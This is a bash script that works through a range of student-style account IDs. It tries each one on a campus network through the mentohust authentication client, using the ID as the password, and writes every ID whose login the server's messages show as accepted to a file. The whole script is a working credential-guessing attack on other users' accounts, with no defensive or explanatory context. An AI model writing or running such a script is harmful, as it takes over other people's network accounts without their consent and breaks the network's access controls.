#!/bin/bash
number=
tempfile=mentemp
stunum3=bgnxy
stunum4=291
i=1
> $tempfile
while [ $stunum4 -le 390 ]
do
	if [ $stunum4 -le 9 ] ; then
	number=$stunum3"00"$stunum4
	else
		if [ $stunum4 -le 99 ] ; then
		number=$stunum3"0"$stunum4
		else
		number=$stunum3$stunum4
		fi
	fi	
	echo $number
#	echo $stunum4


#check 
	sudo mentohust -u$number -p$number -l1 >> $tempfile
	sleep 8
	sudo mentohust -k >/dev/null
	info=`grep "提示" $tempfile | tail -1`
	echo $info | grep "在线用户数量上限" 
	if [ $? -eq 0 ] ;then
	echo $number >>sunet
	fi
	echo $info | grep "不允许的接入方式" 
	if [ $? -eq 0 ] ;then
	echo $number >>sunet
        fi
	echo $info | grep "接入方式" 
	if [ $? -eq 0 ] ;then
	echo $number >>sunet
        fi
	echo $info | grep "您当前使用的服务" 
	if [ $? -eq 0 ] ;then
	echo $number >>sunet
        fi

	i=`expr $stunum4 + 1`
	#if [ $i -le 9 ] ; then
	#stunum4=0$i
	#else
	stunum4=$i
	#fi
#	sleep 1
done
#sleep 2
#done
exit 0
